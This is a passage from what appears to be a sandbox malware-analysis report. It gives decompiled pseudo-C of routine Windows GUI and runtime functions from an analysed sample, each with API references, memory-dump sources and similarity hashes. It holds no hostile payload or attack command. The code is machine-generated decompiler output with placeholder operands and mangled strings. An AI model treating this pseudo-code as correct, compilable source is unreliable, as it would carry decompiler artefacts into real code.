				struct tagPOINT _v12;
				void* __ebp;
				void* _t15;
				void* _t24;
				void* _t26;
				intOrPtr* _t28;

				_push(__ecx);
				_push(__ecx);
				_t26 = __ecx;
				if(_a8 == 1) {
					GetCursorPos( &_v12);
					ScreenToClient( *(_t26 + 0x1c),  &_v12);
					if( *((intOrPtr*)(_t26 + 0xec)) == 2 || E0042799F(_t26, _t24,  &_v12,  &_a8) == 0) {
						_push(LoadCursorA(0, 0x7f00));
					} else {
						_t28 = _t26 + 0x100;
						if( *_t28 == 0) {
							 *_t28 = LoadCursorA( *(E00424BFB() + 0xc), 0x7902);
						}
						_push( *_t28);
					}
					SetCursor();
					_t15 = 0;
				} else {
					_t15 = E004136A7(__ecx);
				}
				return _t15;
			}

APIs

GetCursorPos.USER32(?), ref: 00427F10
ScreenToClient.USER32 ref: 00427F1D
LoadCursorA.USER32 ref: 00427F58
SetCursor.USER32(00000000), ref: 00427F72

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: Cursor$ClientLoadScreen
String ID:
API String ID: 120721131-0
Opcode ID: e51a14756c137a731b41b2ac958f9cd84d83be7b681721a6bd8d8d6fbef2bfca
Instruction ID: 6a5175c3ad254a8bfa5679941e9197540f95af319ead360478e78bd6a32066b2
Opcode Fuzzy Hash: e51a14756c137a731b41b2ac958f9cd84d83be7b681721a6bd8d8d6fbef2bfca
Instruction Fuzzy Hash: EE019271718214EFDB209FA0DC49E9A77ACEF08315F81442BF94692250D778A981CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0041031E, Relevance: 7.5, APIs: 5, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041031E(void* _a4, void* _a8) {
				void* _v12;
				DEVMODEA* _t9;
				void* _t20;
				struct HDC__* _t22;
				signed short* _t23;

				if(_a4 == 0) {
					L5:
					return 0;
				}
				_t23 = GlobalLock(_a4);
				_t20 = _a8;
				if(_t20 == 0) {
					_t9 = 0;
				} else {
					_t9 = GlobalLock(_t20);
				}
				if(_t23 != 0) {
					_t22 = CreateDCA(_t23 + ( *_t23 & 0x0000ffff), _t23 + (_t23[1] & 0x0000ffff), _t23 + (_t23[2] & 0x0000ffff), _t9);
					GlobalUnlock(_v12);
					if(_t20 != 0) {
						GlobalUnlock(_t20);
					}
					return _t22;
				} else {
					goto L5;
				}
			}

APIs

GlobalLock.KERNEL32 ref: 00410332
GlobalLock.KERNEL32 ref: 0041033F
CreateDCA.GDI32(?,?,?,00000000), ref: 00410362
GlobalUnlock.KERNEL32(?,?,00000000,00410247,?,?,?,004280B8,?,?,?,?,00403312,?), ref: 00410374
GlobalUnlock.KERNEL32(?,?,00000000,00410247,?,?,?,004280B8,?,?,?,?,00403312,?), ref: 0041037B

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: Global$LockUnlock$Create
String ID:
API String ID: 2536725124-0
Opcode ID: 14f3dffca046701ab7d4ec2d1e6a0767d43de327b0a1f7fdd5dceb5adba20a1f
Instruction ID: 40030820e48ceddce583e067a62accdd91ad43b1dc9828fb23a1b5466954d7d6
Opcode Fuzzy Hash: 14f3dffca046701ab7d4ec2d1e6a0767d43de327b0a1f7fdd5dceb5adba20a1f
Instruction Fuzzy Hash: D0F08C32200225ABC3709B69CC44B67BBDCEF84B91B144826BC98D2210D768DC9596B4

Uniqueness

Uniqueness Score: -1.00%

Function 00420766, Relevance: 7.5, APIs: 5, Instructions: 44
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00420766(void* __ecx) {
				struct tagMSG _v28;
				void* _t9;
				void* _t13;
				void* _t25;

				_t25 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x50)) != 0) {
					if(PeekMessageA( &_v28,  *(__ecx + 0x1c), 0x367, 0x367, 3) == 0) {
						PostMessageA( *(_t25 + 0x1c), 0x367, 0, 0);
					}
					if(GetCapture() ==  *(_t25 + 0x1c)) {
						ReleaseCapture();
					}
					_t13 = E00414DCC(_t25);
					 *((intOrPtr*)(_t25 + 0x50)) = 0;
					 *((intOrPtr*)(_t13 + 0x50)) = 0;
					return PostMessageA( *(_t25 + 0x1c), 0x36a, 0, 0);
				}
				return _t9;
			}

0x0042076b
0x00420772
0x00420795
0x0042079d
0x0042079d
0x004207a8
0x004207aa
0x004207aa
0x004207b2
0x004207b9
0x004207c1
0x00000000
0x004207ca
0x004207d0

APIs

PeekMessageA.USER32(?,?,00000367,00000367,00000003), ref: 00420787
PostMessageA.USER32 ref: 0042079D
GetCapture.USER32 ref: 0042079F
ReleaseCapture.USER32 ref: 004207AA
PostMessageA.USER32 ref: 004207C7

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: Message$CapturePost$PeekRelease
String ID:
API String ID: 1125932295-0
Opcode ID: fafcdf858dfd4d5881f13f031e6783ff2565456282c47121873f618ee18b7fdb
Instruction ID: 6827468c5831c533ec62b3620ea1e9f85116333d279ed9cea6cc2e4bf68413d0
Opcode Fuzzy Hash: fafcdf858dfd4d5881f13f031e6783ff2565456282c47121873f618ee18b7fdb
Instruction Fuzzy Hash: 82F0A431600748BFC6306F22EC44D177FBCFF81748B85466EF54192512D736B5068A68

Uniqueness

Uniqueness Score: -1.00%

Function 00408E53, Relevance: 7.5, APIs: 5, Instructions: 38
threadCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00408E53() {
				void _t10;
				long _t15;
				void* _t16;

				_t15 = GetLastError();
				_t16 = TlsGetValue( *0x436fb0);
				if(_t16 == 0) {
					_t16 = E00407333(1, 0x74);
					if(_t16 == 0 || TlsSetValue( *0x436fb0, _t16) == 0) {
						E00406490(0x10);
					} else {
						E00408E40(_t16);
						_t10 = GetCurrentThreadId();
						 *(_t16 + 4) =  *(_t16 + 4) | 0xffffffff;
						 *_t16 = _t10;
					}
				}
				SetLastError(_t15);
				return _t16;
			}

0x00408e61
0x00408e69
0x00408e6d
0x00408e78
0x00408e7e
0x00408ea8
0x00408e91
0x00408e92
0x00408e98
0x00408e9e
0x00408ea2
0x00408ea2
0x00408e7e
0x00408eaf
0x00408eb9

APIs

GetLastError.KERNEL32(?,00000000,0040903E,00000000,?,?,?,00406482,?,?,00000000,00000000), ref: 00408E55
TlsGetValue.KERNEL32(?,00000000,0040903E,00000000,?,?,?,00406482,?,?,00000000,00000000), ref: 00408E63
SetLastError.KERNEL32(00000000,?,00000000,0040903E,00000000,?,?,?,00406482,?,?,00000000,00000000), ref: 00408EAF

Part of subcall function 00407333: HeapAlloc.KERNEL32(00000008,?,?,?,?,00408E0B,00000001,00000074,?,004063F8), ref: 00407388

TlsSetValue.KERNEL32(00000000,?,00000000,0040903E,00000000,?,?,?,00406482,?,?,00000000,00000000), ref: 00408E87
GetCurrentThreadId.KERNEL32 ref: 00408E98

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: ErrorLastValue$AllocCurrentHeapThread
String ID:
API String ID: 2020098873-0
Opcode ID: 2b5b8b5e168096cfbcd271e56a6e16956dee3cf8b16a5a5d463a545d2d07131e
Instruction ID: 621b0a22466fadbf8087ca8eaa5014453414117e276020d1f2dab8d9fe1528b5
Opcode Fuzzy Hash: 2b5b8b5e168096cfbcd271e56a6e16956dee3cf8b16a5a5d463a545d2d07131e
Instruction Fuzzy Hash: 4FF0CD32A01612ABC3312B21FD0DA1F3B60EB01BA1715413EF985F62E0CF38980286EC

Uniqueness

Uniqueness Score: -1.00%

Function 004239AC, Relevance: 7.5, APIs: 5, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 47%

			E004239AC(struct tagRECT* _a4, long _a8, signed char _a10) {
				void* __esi;
				void* __ebp;
				int _t13;
				int _t14;
				intOrPtr _t16;
				void* _t19;
				struct tagRECT* _t21;

				if( *0x439c44 != 0) {
					return AdjustWindowRectEx(_a4, _a8, 0, 0x188);
				}
				if((_a8 & 0x00040600) == 0) {
					_push(GetSystemMetrics(6));
					_push(5);
				} else {
					_push(GetSystemMetrics(0x21));
					_push(0x20);
				}
				_t13 = GetSystemMetrics();
				_t21 = _a4;
				_t14 = InflateRect(_t21, _t13, ??);
				if((_a10 & 0x000000c0) != 0) {
					E00422A19(_t19, _t21);
					_t16 =  *0x439c9c; // 0x0
					_t21->top = _t21->top - _t16;
					return _t16;
				}
				return _t14;
			}

APIs

AdjustWindowRectEx.USER32(?,?,00000000,00000188), ref: 004239C6
GetSystemMetrics.USER32 ref: 004239DF
GetSystemMetrics.USER32 ref: 004239F3
InflateRect.USER32(?,00000000), ref: 004239FA

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: MetricsRectSystem$AdjustInflateWindow
String ID:
API String ID: 4080371637-0
Opcode ID: 67a0c6fe0a519a19a0a988f210252f9171ec363cbc846e234bf147fda85e58ab
Instruction ID: e5fc7e5830382d5c46746aa1a576b8dc40ee31b23e133811d6216470331d8181
Opcode Fuzzy Hash: 67a0c6fe0a519a19a0a988f210252f9171ec363cbc846e234bf147fda85e58ab
Instruction Fuzzy Hash: 3DF0C831740328BBDB205F94BD09BAA3B68EF01711F848026BA496B1D0C7F85E91CFD9

Uniqueness

Uniqueness Score: -1.00%

Function 004258D4, Relevance: 7.5, APIs: 5, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004258D4(long* __ecx) {
				long _t4;
				intOrPtr _t5;
				void* _t6;
				void* _t13;
				intOrPtr _t14;
				long* _t15;

				_t15 = __ecx;
				_t4 =  *__ecx;
				if(_t4 != 0xffffffff) {
					TlsFree(_t4);
				}
				_t1 = _t15 + 0x14; // 0x772a28
				_t5 =  *_t1;
				if(_t5 != 0) {
					do {
						_t14 =  *((intOrPtr*)(_t5 + 4));
						E00425BA0(_t15, _t5, 0);
						_t5 = _t14;
					} while (_t14 != 0);
				}
				_t3 = _t15 + 0x10; // 0x760150
				_t6 =  *_t3;
				if(_t6 != 0) {
					_t13 = GlobalHandle(_t6);
					GlobalUnlock(_t13);
					_t6 = GlobalFree(_t13);
				}
				DeleteCriticalSection(_t15 + 0x1c);
				return _t6;
			}

APIs

TlsFree.KERNEL32(00000000,?,?,00425DE1,00000000,00000001), ref: 004258E0
GlobalHandle.KERNEL32(00760150), ref: 00425908
GlobalUnlock.KERNEL32(00000000,?,?,00425DE1,00000000,00000001), ref: 00425911
GlobalFree.KERNEL32 ref: 00425918
DeleteCriticalSection.KERNEL32(00439990,?,?,00425DE1,00000000,00000001), ref: 00425922

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: Global$Free$CriticalDeleteHandleSectionUnlock
String ID:
API String ID: 2159622880-0
Opcode ID: b0e24e41586e67530e86372130e889ff14c8a03bde70290e60b9324eba9df65b
Instruction ID: 9d5b72b6300baeafbca016f02161f8457eec0fc2b083dcd5d79a1fa835123fe9
Opcode Fuzzy Hash: b0e24e41586e67530e86372130e889ff14c8a03bde70290e60b9324eba9df65b
Instruction Fuzzy Hash: 4AF05E31700A20DBC630AB39BC0CA2B77BDEF857207D5056AF811D3361DB78DC0686A8

Uniqueness

Uniqueness Score: -1.00%

Function 00428BA1, Relevance: 7.5, APIs: 5, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00428BA1(void* __ecx) {
				int _t22;

				_t22 = SaveDC( *(__ecx + 8));
				if( *(__ecx + 4) == 0) {
					 *((intOrPtr*)(__ecx + 0x1c)) = 0x7fff;
				} else {
					SelectObject( *(__ecx + 4), GetStockObject(0xd));
					 *((intOrPtr*)(__ecx + 0x1c)) = SaveDC( *(__ecx + 4)) - _t22;
					SelectObject( *(__ecx + 4),  *(__ecx + 0x28));
				}
				return _t22;
			}

0x00428bb5
0x00428bb7
0x00428be3
0x00428bb9
0x00428bcc
0x00428bd8
0x00428bde
0x00428be0
0x00428bef

APIs

SaveDC.GDI32(?), ref: 00428BAF
GetStockObject.GDI32(0000000D), ref: 00428BBC
SelectObject.GDI32(00000000,00000000), ref: 00428BCC
SaveDC.GDI32(00000000), ref: 00428BD1
SelectObject.GDI32(00000000,?), ref: 00428BDE

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: Object$SaveSelect$Stock
String ID:
API String ID: 2785865535-0
Opcode ID: b0c6eb11383a7c2230445b6428623304df77a31237e978569f1d240e3b2e7084
Instruction ID: 39288a4f9771774ee527ad7dc5e24ccfae81283b4a828b13e1b5aa3fcaf6deb1
Opcode Fuzzy Hash: b0c6eb11383a7c2230445b6428623304df77a31237e978569f1d240e3b2e7084
Instruction Fuzzy Hash: 05F05871201708AFD7312F66EC44E2BBBA9EB44751B40453EE15682520DB72B816DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041C80F, Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 302
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E0041C80F(intOrPtr* __ecx, void* __edx, intOrPtr* _a4, signed int _a8, signed int _a12) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				struct tagRECT _v44;
				signed int _v48;
				signed int _v52;
				struct tagRECT _v68;
				intOrPtr _t173;
				intOrPtr* _t174;
				intOrPtr _t177;
				signed char _t179;
				intOrPtr* _t181;
				signed char _t185;
				signed int _t187;
				signed int _t188;
				intOrPtr* _t202;
				signed int _t205;
				signed int _t206;
				signed int _t215;
				signed int _t224;
				intOrPtr* _t227;
				intOrPtr* _t232;
				intOrPtr _t233;
				signed int _t250;
				signed int _t252;
				signed int _t256;
				signed int _t260;
				void* _t263;
				signed int _t266;
				signed int _t268;
				intOrPtr _t272;
				signed int _t275;
				signed int _t279;

				_t263 = __edx;
				_t227 = __ecx;
				_t266 = 0;
				_push(0);
				_push(0);
				_push(0x418);
				_v8 = 0;
				_v52 = 0;
				_v48 = 0;
				_t275 =  *((intOrPtr*)( *__ecx + 0xa0))();
				_v28 = _t275;
				if(_t275 != 0) {
					_t177 = E004131DD(_t275 + _t275 * 4 << 2);
					_v8 = _t177;
					if(_t275 > 0) {
						_v12 = _t177;
						do {
							E0041C295(_t227, _t266, _v12);
							_v12 = _v12 + 0x14;
							_t266 = _t266 + 1;
						} while (_t266 < _t275);
						_t268 = 0;
						if(_t275 > 0) {
							_t179 =  *(_t227 + 0x64);
							if((_t179 & 0x00000002) == 0) {
								_t256 = _t179 & 0x00000004;
								_v44.bottom = _t256;
								if(_t256 == 0) {
									L19:
									_push(_t268);
									asm("sbb eax, eax");
									_t215 =  ~(_a8 & 0x00000002) & 0x00007fff;
									__eflags = _t215;
									_push(_t215);
								} else {
									if((_a8 & 0x00000004) != 0) {
										L18:
										_push(_t268);
										_push( *((intOrPtr*)(_t227 + 0x54)));
									} else {
										if((_a8 & 0x00000008) == 0) {
											__eflags = _a8 & 0x00000010;
											if((_a8 & 0x00000010) == 0) {
												__eflags = _a12 - 0xffffffff;
												if(_a12 == 0xffffffff) {
													__eflags = _t179 & 0x00000001;
													if((_t179 & 0x00000001) == 0) {
														goto L19;
													} else {
														goto L18;
													}
												} else {
													SetRectEmpty( &_v44);
													E0041F52D(_t227,  &_v44, _a8 & 0x00000002);
													_t224 = _a8 & 0x00000020;
													__eflags = _t224;
													if(_t224 == 0) {
														_t260 = _v44.right - _v44.left;
														__eflags = _t260;
													} else {
														_t260 = _v44.bottom - _v44.top;
													}
													_push(_t224);
													_push(_t260 + _a12);
												}
											} else {
												_push(0);
												_push(0);
											}
										} else {
											_push(0);
											_push(0x7fff);
										}
									}
								}
								_push(_t275);
								_push(_v8);
								E0041C6B2(_t227, _t263);
							}
							_push(_t275);
							_push(_v8);
							_push( &(_v44.right));
							_t181 = E0041C4B6(_t227);
							_v52 =  *_t181;
							_v48 =  *((intOrPtr*)(_t181 + 4));
							if((_a8 & 0x00000040) != 0) {
								 *(_t227 + 0x84) =  *(_t227 + 0x84) & 0x00000000;
								_v20 = _t268;
								_v44.bottom =  *(_t227 + 0x84);
								if(_t275 > 0) {
									_t250 = _t275;
									_t202 = _v8 + 4;
									_v24 = _t202;
									do {
										if(( *(_t202 + 5) & 0x00000001) != 0 &&  *_t202 != 0) {
											_t268 = _t268 + 1;
										}
										_t202 = _t202 + 0x14;
										_t250 = _t250 - 1;
									} while (_t250 != 0);
									if(_t268 > 0) {
										_t205 = E004131DD(_t268 + _t268 * 2 << 3);
										if(_t205 == 0) {
											_t205 = 0;
											__eflags = 0;
										} else {
											_a12 = _t268 - 1;
										}
										_v16 = _v16 & 0x00000000;
										_a12 = _a12 & 0x00000000;
										_v20 = _t205;
										_t67 = _t205 + 8; // 0x8
										_t272 = _t67;
										_t206 = _v24;
										_v12 = _t272;
										_v24 = _t206;
										do {
											if(( *(_t206 + 5) & 0x00000001) != 0 &&  *_t206 != 0) {
												_t252 = _a12;
												 *((intOrPtr*)(_t272 - 8)) = _t252;
												 *((intOrPtr*)(_t272 - 4)) =  *_t206;
												 *((intOrPtr*)( *_t227 + 0xe0))(_t252,  &_v68);
												E0041A32D(_t227,  &_v68);
												_v16 = _v16 + 1;
												asm("movsd");
												asm("movsd");
												_v12 = _v12 + 0x18;
												_t206 = _v24;
												asm("movsd");
												asm("movsd");
												_t275 = _v28;
												_t272 = _v12;
											}
											_a12 = _a12 + 1;
											_t206 = _t206 + 0x14;
											_v24 = _t206;
										} while (_a12 < _t275);
										_t268 = _v16;
									}
								}
								_t185 =  *(_t227 + 0x64);
								if((_t185 & 0x00000001) != 0 && (_t185 & 0x00000004) != 0) {
									 *((intOrPtr*)(_t227 + 0x54)) = _v52;
								}
								_a12 = _a12 & 0x00000000;
								_t308 = _t275;
								if(_t275 > 0) {
									_v16 = _v8;
									do {
										E0041C2B4(_t227, _t308, _a12, _v16);
										_a12 = _a12 + 1;
										_v16 = _v16 + 0x14;
									} while (_a12 < _t275);
								}
								if(_t268 > 0) {
									_t187 = _v20;
									_v24 = _t268;
									_t113 = _t187 + 8; // 0x8
									_t279 = _t113;
									_a12 = _t279;
									do {
										_t188 = E0041649C(_t227,  *((intOrPtr*)(_t279 - 4)));
										_v28 = _t188;
										if(_t188 != 0) {
											GetWindowRect( *(_t188 + 0x1c),  &_v68);
											 *((intOrPtr*)( *_t227 + 0xe0))( *((intOrPtr*)(_a12 - 8)),  &_v68);
											E0041663D(_v28, 0, _v68.left -  *_t279 + _v68.left, _v68.top -  *((intOrPtr*)(_t279 + 4)) + _v68.top, 0, 0, 0x15);
											_t279 = _a12;
										}
										_t279 = _t279 + 0x18;
										_t130 =  &_v24;
										 *_t130 = _v24 - 1;
										_a12 = _t279;
									} while ( *_t130 != 0);
									E00413206(_v20);
								}
								 *(_t227 + 0x84) = _v44.bottom;
							}
							E00413206(_v8);
						}
					}
				}
				SetRectEmpty( &_v68);
				E0041F52D(_t227,  &_v68, _a8 & 0x00000002);
				_v48 = _v48 + _v68.top - _v68.bottom;
				_v52 = _v52 + _v68.left - _v68.right;
				_t232 = E0041E6BA( &(_v44.right), _a8 & 0x00000001, _a8 & 0x00000002);
				_t173 =  *_t232;
				_t233 =  *((intOrPtr*)(_t232 + 4));
				if(_v52 <= _t173) {
					_v52 = _t173;
				}
				if(_v48 <= _t233) {
					_v48 = _t233;
				}
				_t174 = _a4;
				 *_t174 = _v52;
				 *((intOrPtr*)(_t174 + 4)) = _v48;
				return _t174;
			}

APIs

SetRectEmpty.USER32(?), ref: 0041C8B7
GetWindowRect.USER32 ref: 0041CA5F
SetRectEmpty.USER32(?), ref: 0041CAD0

Strings

@, xrefs: 0041C924

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: Rect$Empty$Window
String ID: @
API String ID: 444217639-2766056989
Opcode ID: d032af0db132cd29ccf4fbc2b8467907f78f06d14932db45b8acfededcc1a552
Instruction ID: cf120915a9bc79257b06898680a609e4f39c2be92c1a3f6b3b2cd3709033a41d
Opcode Fuzzy Hash: d032af0db132cd29ccf4fbc2b8467907f78f06d14932db45b8acfededcc1a552
Instruction Fuzzy Hash: 81C14771A40219AFCF15DFA8CC84AEEBBB5FF44354F04816AE815AB351D738AD81CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00418A76, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112
stringCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E00418A76() {
				intOrPtr _t35;
				void* _t38;
				intOrPtr _t48;
				intOrPtr _t49;
				void* _t50;
				void* _t64;
				intOrPtr* _t74;
				intOrPtr _t76;
				intOrPtr _t77;
				void* _t78;
				intOrPtr _t90;

				E00406520(E00429F80, _t78);
				_t35 =  *0x436980; // 0x436994
				_t55 =  *((intOrPtr*)(_t78 + 0x14));
				 *((intOrPtr*)(_t78 - 0x10)) =  *((intOrPtr*)(_t78 + 0x14));
				 *((intOrPtr*)(_t78 + 0x14)) = _t35;
				_t74 =  *((intOrPtr*)(_t78 + 0xc));
				 *(_t78 - 4) = 0;
				if(_t74 == 0) {
					L19:
					if( *((intOrPtr*)( *((intOrPtr*)(_t78 + 0x14)) - 8)) == 0) {
						_t90 =  *0x439c48; // 0x1
						_push(0x104);
						if(_t90 == 0) {
							lstrcpynA(_t78 - 0x114,  *(_t78 + 8), ??);
						} else {
							_push(_t78 - 0x114);
							_push( *(_t78 + 8));
							E00417CBF();
						}
						E0041E3FA(_t78 + 0x14, _t55, _t78 - 0x114);
					}
					E0041BB46( *((intOrPtr*)(_t78 + 0x14)), 0x30,  *((intOrPtr*)(_t78 - 0x10)));
					L25:
					 *(_t78 - 4) =  *(_t78 - 4) | 0xffffffff;
					_t38 = E00416AEC(_t78 + 0x14);
					 *[fs:0x0] =  *((intOrPtr*)(_t78 - 0xc));
					return _t38;
				}
				if(E00416753(_t74, 0x42d4d0) != 0) {
					goto L25;
				}
				if(E00416753(_t74, ?str?) == 0) {
					_t48 = E00416753(_t74, "H�B");
					__eflags = _t48;
					if(_t48 == 0) {
						goto L19;
					}
					_t49 =  *((intOrPtr*)(_t74 + 0x10));
					_t64 = _t74 + 0x10;
					__eflags =  *((intOrPtr*)(_t49 - 8));
					if( *((intOrPtr*)(_t49 - 8)) == 0) {
						E00416BE5(_t64,  *(_t78 + 8));
					}
					_t50 = E00416CC1(_t78 + 0x14, _t78, 0xff);
					__eflags =  *((intOrPtr*)( *_t74 + 0xc))(_t50, 0x100, _t78 - 0x10);
					if(__eflags == 0) {
						_t76 =  *((intOrPtr*)(_t74 + 8));
						__eflags = _t76 - 2;
						if(__eflags >= 0) {
							__eflags = _t76 - 3;
							if(__eflags <= 0) {
								_t55 = 0xf121;
							} else {
								__eflags = _t76 - 5;
								if(_t76 == 5) {
									__eflags =  *((intOrPtr*)(_t78 + 0x10));
									_t55 = (0 | __eflags != 0x00000000) + 0xf123;
								} else {
									__eflags = _t76 - 0xd;
									if(__eflags == 0) {
										_t55 = 0xf122;
									}
								}
							}
						}
					}
					E00416D10(_t78 + 0x14, __eflags, 0xffffffff);
				} else {
					_t77 =  *((intOrPtr*)(_t74 + 8));
					if(_t77 == 3 || _t77 > 4 && _t77 <= 7) {
						_t55 = 0xf120;
					}
				}
			}

APIs

__EH_prolog.LIBCMT ref: 00418A7B
lstrcpynA.KERNEL32(?,?,00000104), ref: 00418BA1

Strings

HB, xrefs: 00418AEF
pB, xrefs: 00418ABB

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: H_prologlstrcpyn
String ID: HB$pB
API String ID: 588646068-605489205
Opcode ID: ff96da6f84b56ea17657301ddea9ad1fb8759a806265bcfd84cdef9f7fdf6d18
Instruction ID: a9f5f5579fdfe236bfe92a05d823b87aef4f8825b77d1c3b985387d1bf5da384
Opcode Fuzzy Hash: ff96da6f84b56ea17657301ddea9ad1fb8759a806265bcfd84cdef9f7fdf6d18
Instruction Fuzzy Hash: EF419D71A0421A9BCF21EF55C8819EEB3A5EF04354F11412FF866A71E0EB38AD80CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 00416FCD, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 109
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E00416FCD(void** __ecx, char* _a4, short _a8) {
				signed int _v8;
				void** _v12;
				signed int _v16;
				short* _v20;
				short _v84;
				signed int _t47;
				signed int _t48;
				void* _t61;
				signed int* _t67;
				void* _t75;
				signed int _t81;
				short* _t84;
				signed int _t86;
				signed int _t93;
				void** _t94;
				void* _t96;

				_v12 = __ecx;
				if(__ecx[1] != 0) {
					_t67 = GlobalLock( *__ecx);
					_t47 = _t67[0];
					_v8 = 0 | _t47 == 0x0000ffff;
					if(_t47 != 0xffff) {
						_t48 =  *_t67;
					} else {
						_t48 = _t67[3];
					}
					asm("sbb esi, esi");
					_v16 = _t48 & 0x00000040;
					_t93 = ( ~_v8 & 0x00000002) + 1 << 1;
